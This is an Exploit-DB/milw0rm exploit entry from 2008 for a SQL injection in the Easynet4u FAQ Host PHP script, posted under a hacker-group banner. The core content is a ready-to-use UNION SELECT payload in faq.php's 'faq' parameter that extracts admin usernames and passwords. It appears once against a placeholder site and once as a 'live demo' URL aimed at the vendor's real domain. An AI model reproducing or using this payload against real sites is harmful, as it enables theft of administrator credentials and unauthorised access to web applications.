Easynet4u faq Host faq.php faq Remote SQL Injection Vulnerability

2008-10-10T00:00:00
ID EDB-ID:6722
Type exploitdb
Reporter SuB-ZeRo
Modified 2008-10-10T00:00:00

Description

Easynet4u faq Host (faq.php faq) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                             ####   #    # ######               ##########
#       #    # #    #               #        #
 ####   #    # #    #   #########   #        # 
     #  #    # #####    #########   #        #
#    #  #    # #    ##              ##########
 ####   ###### #######
############### >>> Remote SQL Injection <<<  #########
##    CoNsTaNtiNe HaCkErS25                         ##
################## >>> SuB-ZeRo  <<< ################
 author  :  SuB-ZeRo(AlGeRiA-HaCkErS)
 contact :  FbH@hotmail.com
 homepage:  www.no-exploit.com               
 script  : faq_host script
 download: http://www.easynet4u.com/easyshop/index.php?do=catalog&c=remotely_hosted_scripts&i=faq_host
 dork    : find it
 exploit:
 www.site.me/script/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--
 L!Ve DeMo
 http://www.easynet4u.com/faqs/faq.php?faq=1+union+select+1,2,concat(username,0x3a,password),4,5,6+from+admin--

########### Greetz #############
>>> SuB-ZeRo
>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & crazy-zero & bibi-info & HiSoK4
>>> all muslims

# milw0rm.com [2008-10-10]